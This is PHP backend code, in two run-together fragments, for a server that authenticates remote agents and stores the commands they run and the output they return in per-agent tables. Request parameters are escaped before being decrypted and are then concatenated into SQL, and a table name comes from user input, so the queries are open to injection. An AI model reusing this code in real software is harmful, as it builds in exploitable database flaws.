function filter($variable) { return mysql_real_escape_string($variable); } function queryOrDie($query) { $query = mysql_query($query); if (!$query) { exit(mysql_error()); } return $query; } $macAgent = decRijndael(filter($_GET['token'])); $os = decRijndael(filter($_GET['s'])); $version = "v" . decRijndael(filter($_GET['v'])); $key = decRijndael(filter($_GET['k'])); $agent = $macAgent; $configFile = parse_ini_file("config.ini"); $keyquery = mysql_query("SELECT password FROM t_crypt"); $keypass = mysql_fetch_array($keyquery); /* If agent has the correct key (password), then connect */ if ($key == $keypass[0]) { $result = mysql_query("SELECT count(*) FROM t_agents WHERE agent='" . $agent . "'"); if ($row_a = mysql_fetch_array($result)) { $count = $row_a[0]; } $date = date('Y-M-d H:i:s'); $countcalendar = null; if ($count[0] > 0) { date_default_timezone_set($configFile['php_timezone']); $datecalendar = date('Y-m-d');
$actual_date2 = strtotime($actual_date); $dife = $actual_date2 - $update_date2; $minutesstr = $dife / 60; $minutes = (int) $minutesstr; $minutes = $minutes + 60; return $minutes; } function filter($variable) { return addcslashes(mysql_real_escape_string($variable), ',<>'); } $macAgent = decRijndael(filter($_GET['m'])); $id_uniq_command = decRijndael(filter($_GET['id'])); $finished = filter($_GET['end']); $command = filter($_GET['c']); $content = decRijndael(filter($_GET['response'])); $table = 't_' . $macAgent; $result_a = mysql_query("SELECT count(*) FROM " . $table . " WHERE id_uniq_command=" . $id_uniq_command . " AND finished=false order by date desc limit 1"); $row_a = mysql_fetch_array($result_a); /* If the agent exists or not */ if ($row_a[0] > 0) { $result_b = mysql_query("SELECT * FROM " . $table . " WHERE id_uniq_command=" . $id_uniq_command); $row_b = mysql_fetch_array($result_b); if ($finished == 0) { $result = mysql_query("Update " . $table . " set date=now(), response='" . $row_b["response"] . $content . "' where id_uniq_command=" . $id_uniq_command); } else { $result = mysql_query("Update " . $table . " set date=now(), response='" . $row_b["response"] . $content . "', finished=true where id_uniq_command=" . $id_uniq_command); } } else { if ($finished == 0) { $query = "INSERT INTO " . $table . " (command, response, finished, date, id_uniq_command, showed) VALUES ('" . $command . "','" . $content . "',false,now()," . $id_uniq_command . ",false) ";